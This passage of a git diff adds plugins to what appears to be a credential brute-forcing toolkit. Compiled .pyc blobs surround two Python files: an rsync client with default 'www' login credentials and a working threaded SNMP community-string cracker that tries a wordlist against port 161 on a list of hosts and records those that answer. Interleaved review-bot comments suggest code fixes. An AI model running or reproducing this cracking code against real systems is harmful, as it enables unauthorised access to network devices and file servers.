zGx&8;mDC5Sp<3#KdPgmTZ)FwCxWe)NpxX%u0-n{Fci^1R41;>Xl1H>X*_s{t_{B3i zo)fzUa}5-miUqexP#Dov=`z^z9}6{!8ARp-4t}C-J{?}9nJP5dH^UF>GL#Ia6}p6s zCJ#9a1^{-_TqT_kIUSx_rXd<^<8*n7IM9`+Wn|%~gJreN?Uvh76L@aA7a+|lM3DQz z{waamNqX4rcFkqXe}Cge+gLxh?YDMZH^MP2Fj1K$_oYJcDuBZ?!!$c93a$xMgt>X@ z_DzRO!JCn7@A;P%B(zJb6KkYYcB5E#IBF@CSSKzYD@$x7>pahZZ*A!(jfU^cem-q^fY&f=(;!8=IK8m3Vq_2x23 z<)w3&M^<|hAD>bb6bBJyVH8+NB}1o=QPfhJMejH6HTEEZG1wA2=M)LH*1ZD#+zOEU zOFmBC$B%gzg47bKZc#OzRkecZTX2@u=T57%s8*dTN;-oC?sQ|w^w`tFl0A`&+E6=ySMSI zZ)|k$e02ZrosD}1*}31oy%^oblw5$}MK~*7xIL?l?Of!=>nu0|VNr35{3(JrtWd9L zy&Q@hBDIn340T{70e1r{1(}Wt24}wAbGh$XZn;4^8g+{g0-=)2#p&K+!QUDMu@TJq j<149rT-@XX`L67MQC(h{Q#q^h)UI)D=bXe4wIqF%4Y}PpFHw_?&brtO zV$X3^XG83U3@(a2FLqrb?6oY>ioB{Ald4mmw9mpz@wfQfX;)A!7Ez4yI4vH>=|QnD zYxy=R>a)hf+}gAa&q`56@i@zpvNea+7h^lNWs|4ybU(L2RJOU|nu^KYaT<1?kMq&# zk#X?1_}s@REG&d!LQmnCaD1#(B=WRUbNkRkG5a1+-tSOMj7&tj zP}s=8qXXHjNWZL9*&N^pd4`_jXibXw*-Sm~CvD2zamy&fEbVQn6`QQK>9&IQvK9B$ zjfI*Xr+xL(=UI55m4p>e&8-_Jg--3oiM^S`t|(|j5~tSrRf^<}ZloLQVrP>cY`{Kk z6rzQ@joQ{TXLGmpGEQ8UZWTBZx7D+0e}5dLeHR94YV+>aC>i(T)J-)X9qR#iyKx#9 z-R>EPaXe%(i)I<$d86K>BGf~@`93P}(TOL8x)shksmP=v19%Od1yg0Oo4xE;InZnxb!xT~SRg(2+pNU|v8R>Q$YFp;==l;ADX?K3SBb 
zM>1KE0kEo*w)gJINnIxT8-S)3xU_Y$B$Fk{zh+75sYw2fOcrH;c}pt%@EbY&n!nuw za~IhM8#(bW=IHP2+1~q`P!1xdA%iBP#DJ)ZBnPELtIX zQ3W*NnI<9hN-8H!DbC7Zm1H%6U=ZWjaK5sh0e`{Q;I8SUmD!}%5}oDH;cNbO(;D4| z_HMc+)#98S)FuB1e1AqvYUB@-IpA{@r?{i|M4&@tJha)khOP)y{+MyY3SDdvO}IuDaGRi^hp<#VH#>fl>p#>{jrOfpP5{1Vj4$Hub5O$_&E8ahzMN=Qgo{ zv;G)W-yhJO+%p|olhU70hDAz{gmaAYB$RA zk|AmMfhvbM)eU>4ap2UE>Q?&P=`!-Erk%1=WplsWsR*pmgSBn+{dh`ks$}N3>A74+ zhr37F;E@WL^(Ut3T>_sp&9YZB>t;>)<$|}WeJH(#dC#nxIyiXMtax>A*;Gx)v!F`| z)(8095Rf_EF-H%l)U&L%OPiF$B`+)KmR57Rr z)#s#Fm33u3$N<49m62$EX#C9{hv1ZQ(^4+Tu4E@lJSC{p`Ix@Dn{I$D>dF@T%G3r_ z{qQqVMkJsNX2%@`%UvZ74O*oJcNIguAWp7ac^-tp*t!;y?gvFnxgki8r{vJAYfQVJ zy*2#}I9su6**wp3kk3ub1DR;vEGeb6AGp>_;NPaLS#(^v@?rUR)!n`7u#DQAE@NJe zL)-emfsruYN*JdtYTIfvvVA6GpQ+vd4GZnN#u`b<|0N3sjNf3vF!4V^(Iy%-eEl1& z{R)K!Toe?6PtE;Xv#wqe^nC`wy9qLCSY9HP3bxU7++Gl1D+s7HvwkUHYBA}OFGB|Yv6JZ!tcrOE*0e_@9)-iw-JV)!9 z$29*R?GbMju)X(%Fzc5o9#a5IL=2|uRRGgZlQy!}MR4Q~3@oT3xJbMb&m4X(yA+4V z0Ze8MsT(z5{JW|lC!cBu)NerBqx(`c)Ho=C1gklDd+&Y0HG+DbkpbQaWo}0RVOM5o zMi6%W5ArE4Jd6ag+>SE8BmIYY5FSiX+CuKy+}w1`Sbw~>*K$RW7p?EjKw{*jt~X9Y ztps`B`S;QDCaS)(JR40V1IWZNQ0%Txg@0FUl%@81TxfuNngkb@K zd7QhAaM{-YRAP$XO@PtBe4JYD#w(5>tm+7shS%`Unn$QJE3J8#OQC~unAWpkoN1HY` zw-m59KDx1a6W@(HcQ$W*eE0UPJHIZ`Oe*~TV603==Q|EULiuvrDsXXV(>Xp5r93x2 zo$+ib;iT+I;w*TD8{)MW<8c#O=Wx86(ResKR*dOe&;O8;h(MorDHW#_m&DH%Oxg1R zZh2~||0QQA2#-rNkAh-fnOX4~X2YRAOyj=Klks_5^dGT!%$3Yzxs76{Z*avdjd{nX lq9%M&!r&g=;AmaLTn3g_@S@^BpvqexPHVXDtl(>y{{hZXkOcq$ literal 0 HcmV?d00001 diff --git a/Bruteforce/plugins/rsynclib.py b/Bruteforce/plugins/rsynclib.py new file mode 100644 index 0000000..816cf67 --- /dev/null +++ b/Bruteforce/plugins/rsynclib.py 
@@ -0,0 +1,194 @@ +import base64 +import re +try: + import hashlib + hash_md4 = hashlib.new("md4") + hash_md5 = hashlib.md5() +except ImportError: + # for Python << 2.5 + import md4 + import md5 + hash_md4 = md4.new() + hash_md5 = md5.new() + +# Import SOCKS module if it exists, else standard socket module socket +try: + import SOCKS; socket = SOCKS; del SOCKS # import SOCKS as socket + from socket import getfqdn; socket.getfqdn = getfqdn; del getfqdn +except ImportError: + import socket +from socket import _GLOBAL_DEFAULT_TIMEOUT + +__all__ = ["rsync"] + + + +# The standard rsync server control port +RSYNC_PORT = 873 +# The sizehint parameter passed to readline() calls +MAXLINE = 8192 +protocol_version = 0 + +# Exception raised when an error or invalid response is received +class Error(Exception): pass + +# All exceptions (hopefully) that may be raised here and that aren't +# (always) programming errors on our side +all_errors = (Error, IOError, EOFError) + + +# Line terminators for rsync +CRLF = '\r\n' +LF = '\n' + +# The class itself +class rsync: + '''An rsync client class. + + To create a connection, call the class using these arguments: + host, module, user, passwd + + All arguments are strings, and have default value ''. + Then use self.connect() with optional host and port argument. + ''' + debugging = 0 + host = '' + port = RSYNC_PORT + maxline = MAXLINE + sock = None + file = None + server_protocol_version = None + + # Initialization method (called by class instantiation). + # Initialize host to localhost, port to standard rsync port + # Optional arguments are host (for connect()), + # and module, user, passwd (for login()) + def __init__(self, host='', module='', user='', passwd='',port=873, + timeout=_GLOBAL_DEFAULT_TIMEOUT): + self.timeout = timeout + if host: + self.connect(host) + if module and user and passwd: + self.login(module, user, passwd) + + def connect(self, host='', port=0, timeout=-999): + '''Connect to host. 
Arguments are: + - host: hostname to connect to (string, default previous host) + - port: port to connect to (integer, default previous port) + ''' + if host != '': + self.host = host + if port > 0: + self.port = port + if timeout != -999: + self.timeout = timeout + self.sock = socket.create_connection((self.host, self.port), self.timeout) + self.af = self.sock.family + self.file = self.sock.makefile('rb') + self.server_protocol_version = self.getresp() + self.protocol_version = self.server_protocol_version[-2:] + return self.server_protocol_version + + + def set_debuglevel(self, level): + '''Set the debugging level. + The required argument level means: + 0: no debugging output (default) + 1: print commands and responses but not body text etc. + ''' + self.debugging = level + debug = set_debuglevel + + # Internal: send one line to the server, appending LF + def putline(self, line): + line = line + LF + if self.debugging > 1: print '*put*', line + self.sock.sendall(line) + + # Internal: return one line from the server, stripping LF. + # Raise EOFError if the connection is closed + def getline(self): + line = self.file.readline(self.maxline + 1) + if len(line) > self.maxline: + raise Error("got more than %d bytes" % self.maxline) + if self.debugging > 1: + print '*get*', line + if not line: raise EOFError + if line[-2:] == CRLF: line = line[:-2] + elif line[-1:] in CRLF: line = line[:-1] + return line + + # Internal: get a response from the server, which may possibly + # consist of multiple lines. Return a single string with no + # trailing CRLF. If the response consists of multiple lines, + # these are separated by '\n' characters in the string + def getmultiline(self): + line = self.getline() + return line + + # Internal: get a response from the server. 
+ # Raise various errors if the response indicates an error + def getresp(self): + resp = self.getmultiline() + if self.debugging: print '*resp*', resp + if resp.find('ERROR') != -1: + raise Error, resp + else: + return resp + + def sendcmd(self, cmd): + '''Send a command and return the response.''' + self.putline(cmd) + return self.getresp() + + def login(self, module='', user = '', passwd = ''): + if not user: user = 'www' + if not passwd: passwd = 'www' + if not module: module = 'www' + + self.putline(self.server_protocol_version) +# self.putline('@RSYNCD: 28.0') +# self.protocol_version = 28 + resp = self.sendcmd(module) + + challenge = resp[resp.find('AUTHREQD ')+9:] + + if self.protocol_version >= 30: + md5=hashlib.md5() + md5.update(passwd) + md5.update(challenge) + hash = base64.b64encode(md5.digest()) + else: + md4=hashlib.new('md4') + tmp = '\0\0\0\0' + passwd + challenge + md4.update(tmp) + hash = base64.b64encode(md4.digest()) + + response, number = re.subn(r'=+$','',hash) + print response + resp = self.sendcmd(user + ' ' + response) + + if resp.find('OK') == -1: + raise Error, resp + return resp + + def getModules(self): + '''Get modules on the server''' + print self.server_protocol_version + self.putline(self.server_protocol_version) + + resp = self.sendcmd('') + print resp + return resp + + + + def close(self): + '''Close the connection without assuming anything about it.''' + self.putline('') + if self.file is not None: + self.file.close() + if self.sock is not None: + self.sock.close() + self.file = self.sock = None + 
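Review bot: `login` prints the computed challenge response unconditionally with `print response`, which puts a password-derived digest on stdout for every authentication attempt and bypasses the `debugging` level that `putline`, `getline` and `getresp` honour. Gate it the same way, `if self.debugging > 1: print '*auth*', response`, or drop it; the two unconditional prints in `getModules` deserve the same treatment. A comment at the top of the file should also record that `hashlib.new("md4")` raises `ValueError`, not `ImportError`, on builds where MD4 is unavailable, so the `except ImportError` fallback does not cover that case.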
diff --git a/Bruteforce/plugins/rsynclib.pyc b/Bruteforce/plugins/rsynclib.pyc new file mode 100644 index 0000000000000000000000000000000000000000..e5cd24376e15bb841e86dcdbbd22d968fb370818 GIT binary patch literal 5937 zcmcIoO;a4n5zU@YW&puTmXN$3YI|3q5sN^Mkk+=sUkCw`g}`o*y*s-R6T@^dG|Y6P zt{x#A=pyN4AN)6bup@kMIDB{b>>smN$I97-hSD zazJID@`#M$C~LJAsS=}73N^3dO?v0O=*oZIyy;L^ z7Vb~s`#Tyy3URUzh%U43padR(2+q0>&~7PQfY>8Wz%4B5{0E95#tR$=GwqcWeaulC z>;Pmmz|Puem9<-zJ!i1$u#13%A>7h69jucpsmZu@5v66h%Kk*&-)sHY6H}d9#)I5ulfz=moi~TLCeaQiSWUB{pQr=bq_c0bjNIVjzLjf_ zKyrSF2|9D9-H&=lDzv?$zR_>*o1LgaaLc~^Q`jae>(|}{LDPhe3NxfR9bhZI>8t% zrYEps@2H5II4jt*b41HzEnQ9V`GO+^Q7Yetn}<8#&O~NjX#9eCNhTnTYh;gAJY0Q1 z(oi1Q1LZni4q*?a+4YELxn*uL3kYY`v($0dR)Y628eBxB1Z+(l;$%Cue|ljrip`mA zpD_U~D02r*O@G9zds8yub*LzT7_sM{(c#9F?A#8q`57=7zyKY(y}Ad4x@9RUg zlH<%A@JrCW3&-mxIMB1*cI;mZ{q3X7SZ50`!>qEArkxFPP;dp6k_nQIkQk|1`t9f1 zCM-P@Ys#jU)2YiFE1Fs=?<@stD<|d)zK=J~)O1jqs`Me(@rHK=OmPWZG2vCD=1t3_ zmXRrGQsoVjoHOMsq4j{}Fd5*S;0CJym*!+pXx>Kx6;XZYA(pN!PJy4yeyYy{5od>+iQVl?K* zM;xk|PY}^@zJFHs48DuiUZPmSLnLa5!HeER;oB_4)5{@(T_LJGcF-cnD7#$8giWxA z&pcUqIH%!kkj8o_3>kUeZRtb2pcI|8n8nQl)S}52k}&&$c8i*mfhKNhcSI--k`p{YJKA{x+v^|57+eIn;2$$rU%2E9 z{8WOXyqgCfvU-=*0;@Sz@1asF@3!qO?z8#T{f=g6gM$zkH*IdWt@-43 z#^tv^xozT361oRr)HS$IaQ)aEx)jkRaCWfmh*me`5;4shd430~(M_&SnVnr6nz(G6 z;0}lARaD4rlCrb@LC)$fD^aE5L4Vt%XXWfc9qarN#m=J=C1VmYN@2P@O} z(eF}UHLxZn&XQ_Vn)8GN0-}0Wpy-Da5dUNSa$^5N1&Nas#=L33PFQe zeCuwDIn^PM_iK{Q=`(y(L!biXJnzz+gO4BSV|*hUJ;r+_V26txYn|xQGW#R0*h_GE z*AEG!uM2v4N4o3d3&EhzEV>;ZWxLwg=6ICNE0F6A=5#JFG;z>_CPC7`@eW06YNrgX z9(-1~2KTYRKTzD!0ZQdvfn~kHQzcNvc;abvwpwA*X|-IkNq$hf1e>3&FSUNP5p3xt zOlLk`{B-T%`f_lMLTC=%fTl&xW9VZ6uV;FF39h20yVY#kL2-jm^*B{klr3oV;2tY# zegcEG-tN0VK+ho?S*}?btKfUUsox61u6q7Lty(G8sxDaQD;cB1Z6`vWPshCRGsGG-A0{t`vZJ@lt83#Q*;VEu7L( literal 0 HcmV?d00001 
diff --git a/Bruteforce/plugins/rsyncs.pyc b/Bruteforce/plugins/rsyncs.pyc new file mode 100644 index 0000000000000000000000000000000000000000..11bd951e974b210055e87278598c737faddb7f91 GIT binary patch literal 9732 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 Vx`C>@YF3*YZ?eZK+(Fxc{0pPGa*O}~ literal 0 HcmV?d00001 diff --git a/Bruteforce/plugins/snmp.py b/Bruteforce/plugins/snmp.py new file mode 100644 index 0000000..9405ee3 --- /dev/null +++ b/Bruteforce/plugins/snmp.py 
@@ -0,0 +1,65 @@
+#coding=utf-8
+import time
+import threading
+from printers import printPink,printGreen
+from multiprocessing.dummy import Pool
+from pysnmp.entity.rfc3413.oneliner import cmdgen
+
+
+class snmp_burp(object):
+
+ def __init__(self,c):
+ self.config=c
+ self.lock=threading.Lock()
+ self.result=[]
+ self.lines=self.config.file2list("conf/snmp.conf")
+
+ def snmp_connect(self,ip,key):
+ crack =0
+ try:
+ errorIndication, errorStatus, errorIndex, varBinds =\
+ cmdgen.CommandGenerator().getCmd(
+ cmdgen.CommunityData('my-agent',key, 0),
+ cmdgen.UdpTransportTarget((ip, 161)),
+ (1,3,6,1,2,1,1,1,0)
+ )
+ if varBinds:
+ crack=1
+ except:
+ pass
+ return crack
+
+ def snmp_l(self,ip,port):
+ try:
+ for data in self.lines:
+ flag=self.snmp_connect(ip,key=data)
+ if flag==1:
+ self.lock.acquire()
+ printGreen("%s snmp has weaken password!!-----%s\r\n" %(ip,data))
+ self.result.append("%s snmp has weaken password!!-----%s\r\n" %(ip,data))
+ self.lock.release()
+ break
+ else:
+ self.lock.acquire()
+ print "test %s snmp's scan fail" %(ip)
+ self.lock.release()
+ except Exception,e:
+ pass
+
+ def run(self,ipdict,pinglist,threads,file):
+ printPink("crack snmp now...")
+ print "[*] start crack snmp %s" % time.ctime()
+ starttime=time.time()
+ pool=Pool(threads)
+ for ip in pinglist:
+ pool.apply_async(func=self.snmp_l,args=(str(ip).split(':')[0],""))
+
+ pool.close()
+ pool.join()
+
+ print "[*] stop crack snmp %s" % time.ctime()
+ print "[*] crack snmp done,it has Elapsed time:%s " % (time.time()-starttime)
+
+ for i in xrange(len(self.result)):
+ self.config.write_file(contents=self.result[i],file=file)
+
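Review bot: The bare `except:` in `snmp_connect` turns every failure, including a pysnmp exception or a KeyboardInterrupt, into the same `crack=0` as a rejected community string, and the call never inspects `errorIndication`, so the "scan fail" line printed by `snmp_l` cannot be told apart from a host that was never reached. I would narrow it to `except Exception as e:` and record the error next to the address. The lock in `snmp_l` is handled with `acquire()`/`release()` pairs; `with self.lock:` releases it even if the print inside raises. `snmp_l` also takes a `port` argument that is never used, since 161 is fixed in `UdpTransportTarget((ip, 161))`.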
diff --git a/Bruteforce/plugins/snmp.pyc b/Bruteforce/plugins/snmp.pyc new file mode 100644 index 0000000000000000000000000000000000000000..4e77b890bd411e316250bcf6b6569e3a73513529 GIT binary patch literal 3157 zcmb_e-)|IE6h1Sv-FBC)Z7Hoth*@Hg6=7>jO8|d_@FQqq8Zv;z)n+ox+}+N0=FTwp zuI(n-?6TNSn&r5eorF6&P9yOS|d7f4!Ml8zWfzmS6=&T4HjmqK$q&(&Z zK63#^VdnxM5a_uKFFPK^t~fP@kZWehzt`b~BHq;V?jQj_a7 z3slWoU+KZ#DAWTJg<7jJSS!-eAkn7UY%#WT7#ReKPHYeygKxNkoQAW2FY@4XMGK!G z1_m<@M;?tIk_9Zl1lAQ_u%AdMo_bOP^bjJC`T!OV_~+5rH9Ep?hK}lVG)t3NDt9SH zjYlBTj-Dk4lyd0d!~@36q3r~w+F3Tf7&1SSXQ%;dVR(-TBbab(Wxzihq#w6d4N??? zD(W!EKF?yAz&G~NvXDI@dEQ4IO02#K z%NvP~O$S~7ckp?Kl4W46R*_xe@+!~l)E&=lImhvD#jQK@j_1@WIxy0V*iC%qXPEK# zbogwVCAW6J<2Z84AX5-=SP!9h5b+5z(iM4nA{|^Bq6teO4?q#lLm|p4YZT8gLqjCm zzqMfKtPH*Tc>dM7z#~kwdgoJ~;6*p|+S$>|R0D+jO)7sN2mBL~Nh0%kw*3>ZLJ)Hf z-dWRTXxi<)(6kR!xUY1(2#q<&%lOQhi~M)i%s0(R^tH;^_H@8Gj6<@u`(cs_8GVkb ze~Jy$!m>Do(c@84DxXQ{GsT5vVNoa@ONUaWDl|&u;Pzpp3g$Qn&0}8wlT7-#xkr2cKNg`xnVK}@_5RzNFS41M}G^{uxtU!zb7jy$e0S|B)vbNOe zE!=)AG~_yuuh7l}qaZlgEqe{|pg=FL9yg>Y8<@<{No?rwV?x>?6PZ9Qo*BPeyYJG` zoK#g8X>-~YnoLAe1vq^HjB9hJzy4|jM6SZHR-)$QkmbU#;`&m4m`ORz z@eE)p9YQIgkla62TDb2sWkl-^%EYRGufHmDL_v8}Qa~fEY`MS{DtDt?vT~^!|2>|8 zStqEO9W@_3Y@=<~y&(glXl=f}w3I~4D~-|IdfUjUhdQ+FHn#zJFhx}7XcbPyOmNw>RJ zy}cNq^M<3p{y}$ReZ9N2)xC6Wb91W-ZT3jsIqMr6-HnZ{?v?fK`o`5{1KkCCX~bOB zBW8{Du*3I=f1V9Tu!Dv$RbcDc06{cK{B! 
z*j?=mLZXU1q?q55-;i^1%P&Z(;<699`efhjuX{l~oaADOg&p?v%=GkhfBnr=zHK+( z{M&b*Ml}DcgTeu@&J!DCs`K#AU?#G^@t1{G2~uR=+cCN&z=Xi}#^z0_j$ z0u2@@u99A)A(qzY&qQZLpAQ2(^vM0$<%1&Uh~!{9QVRg_BQV7uKF z9MXJ`zwNGq=&ERTvMlL(+-so83zNDXlODR}dGCWl>(nixYwbbs#k9yDM~{vCjtAaG zqv5E;3I`r|97z@`6ni36IcBV>k-yvJog?1${JYO)w$Pj?Iw1<+kD{^1$LDT^Mx{{Y z?ijxs?|^gjXr05kE2r4DZ8n{y!%eu`W1+hMjpIyn&y3`t?x4_NY|@bg;b9gXijc6t zQwwdUiIb^Aljwe8taCLCBqr6i3>Y86>SPE{VY`clq_Mw-wE2nEh219huaMulY=(90VpcE(n%j#B$h4HPi~eh_`12pGV^LB?Ls_ zv_`X!$RQ|*2+?VsPU;*x)>K%-pkft*hkzjy9-SaV6*|GN=c%~LHh4yjr>nj6PgF%1 z4x3c`lho+~mIKs^E&?H~ZpiSXfBk6s!rYIc z_g{14MRp}s^w~)bDP>G<8#E-bnIfiXIMLF{Lu-$+B1UZ>QX6RQP2B;oYNF7YEbR zfm@VhFu-AW|2Wb)pUW3Ka}!37rl!!24#D$+Sbz(vm>**e7VYb7SJhQTwbZ)00%;kTUR7;%L9Kdi$ZgeBQ3bP} zLHK{5nEiu}|2{AK2m61eQ^75;UJ?MneCZU(t}y)PstQy9G(ZSU3gm$%;PVVXm+AoG z8OI^*fExjP)B^Y0vIdr_0$gMOfS*GfThwS+r46Yjm`1svDE|LA%#`J^^QcYu?d_%O zD658))mLR%G0=s(m~*y;NVWv-0%`%7eHTM>IF>Lx2yN#`hle`toY%nBtM8P5g6eit zkm(CNnKf*l80WtVNx%RUoevkKU(tBZh76<=FjRvol007qz%3xvP>`0T5IGPnHEco43U8!TuX`x+s1v(|Cm+2kaxjj9u{%0OQN9-_Rbv1o*0C;@NgwZeT^rB`SO% zoYzUSqh7CP86~+Us+} zPfW&Hs^2!Q!^nO=33IFCjx!U@3@!W$E^#2#`Np92?kbGP0TP}1%w6INFDiMHB_C>X z%tt_XG7CaGOC$f6tdyg>!tb1S@b2+n<_=?goT1Ald0gPO)>0)t56H9Vs4z|k{49|B zsbpK8ZSvSeuDlRH_wr^CvX;k&_1|O*3{wfI_{v6eJPxGDr2fr|C?Y;yF->prUR=3^ 